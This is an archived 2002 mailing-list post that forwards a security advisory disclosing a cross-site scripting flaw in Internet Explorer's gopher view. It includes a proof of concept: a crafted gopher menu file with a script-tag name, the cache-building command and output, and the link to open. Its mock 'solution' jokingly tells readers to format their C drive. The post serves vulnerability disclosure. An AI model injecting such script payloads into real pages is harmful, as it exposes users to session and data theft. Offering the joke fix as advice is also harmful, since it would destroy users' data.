[Fwd: IE gopher cross site scripting]

From: KF (dotslashat_private)
Date: Sun Jun 16 2002 - 20:17:19 PDT

  • Next message: pr0ix: "Re: openbse rumours"

    Not sure why but I can't seem to get this message through to the lists...
    -KF
    
    
    
    

    attached mail follows:


    ====================================================================== Strategic Reconnaissance Team Security Advisory (SRT2002-06-16-0314) Topic : IE gopher view Cross Site Scripting Date : June 16, 2002 Credit : KF dotslash[at]snosoft.com Site : http://www.snosoft.com ====================================================================== .: Description: --------------- Internet Explorer 5 (and others?) allow cross site scripting in gopher view. This is currently the lease of your worries with gopher but it may still pose a threat. .: Impact: ---------- The usual cross site scripting attack consequences are subject here. Your script must fit into a finite amount of character space or it will be truncated thus making it fail. In order to duplicate this attack I used gn gohperd on my linux box. I made a malicious .cache file as shown below in order to to exploit the browser. [root@localhost dir]# cat menu Name=<script>alert('When can we see the source code bill?')</script> Path=0/hrmm Type=0 Host=10.0.1.234 Port=70 [root@localhost dir]# /root/gn-2.25-DEV/mkcache/mkcache Warning: Unable to open mime type file: /path/to/src/mkcache/gn_mime.types Using defaults. Writing cache file ./.cache next open the link gopher://10.0.1.234/1 viola javascript alert with extra cheese. .: Systems Affected: -------------------- Microsoft based machines with unknown versions of IExplorer. .: Solution: ------------ Step 1.) Ask your vendor for the source code so that you can make your own patch. Oh wait that would make you an "open source terrorist". Step 2.) In the event that step one fails please format your c drive. ====================================================================== -KF



    This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 09:05:02 PDT